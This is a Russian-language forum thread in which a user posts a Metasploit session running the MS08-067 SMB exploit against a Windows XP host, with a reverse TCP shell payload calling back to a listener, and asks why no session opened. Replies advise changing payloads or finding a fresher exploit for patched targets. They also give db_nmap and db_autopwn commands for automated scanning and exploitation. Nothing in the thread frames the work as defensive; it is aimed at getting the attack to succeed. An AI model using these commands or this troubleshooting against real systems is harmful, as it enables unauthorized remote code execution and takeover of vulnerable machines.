Вудает мне следуюшию ошибку Code: msf > use exploit/windows/smb/ms08_067_netapi msf > set PAYLOAD windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 10.1.1.115 msf exploit(ms08_067_netapi) > set LPORT 55555 msf exploit(ms08_067_netapi) > set RHOST 10.1.1.15 msf exploit(ms08_067_netapi) > exploit PAYLOAD => windows/shell/reverse_tcp LHOST => 10.1.1.115 LPORT => 55555 RHOST => 10.1.1.15 [*] Started reverse handler on 10.1.1.115:55555 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Attempting to trigger the vulnerability... [*] Exploit completed, but no session was created. Кто то сталкивался ? Знает как исправить ?
Я этого и не догоняю Exploit completed, but no session was created. Exploit прошел, но payload не сработал ? Или сам exploit не прошел ?
Это оно говорит, мол сделал всё как надо, но ничего не произошло. Посмотри для каких версий виндовс этот эксплоит. Если всё будет подходить -- попробуй сменить пэйлоуд. А если и это не поможет, то скорее всего, что система пропатчена, лучше поищи посвежее эксплоит. Успехов.
+1 или db_nmap + db_autopwn попробуй Этот эксплоит прокатит наверное только на SP1, что давольно редко встречается.
В сети где-то встречал статьи по работе msf совместно с nmap... Довольно удобно... Получается инструмент для нахождения уязвимости и автоматической ее реализации... Погугли на тему msf...
А что там гуглить в консоли msf подключить драйвер дб db_driver sqlite3 создать таблицу db_create blabla старт скана db_nmap -sV localhost ну и автомат подбор сплойта db_autopwn -p -e. Вот и все ...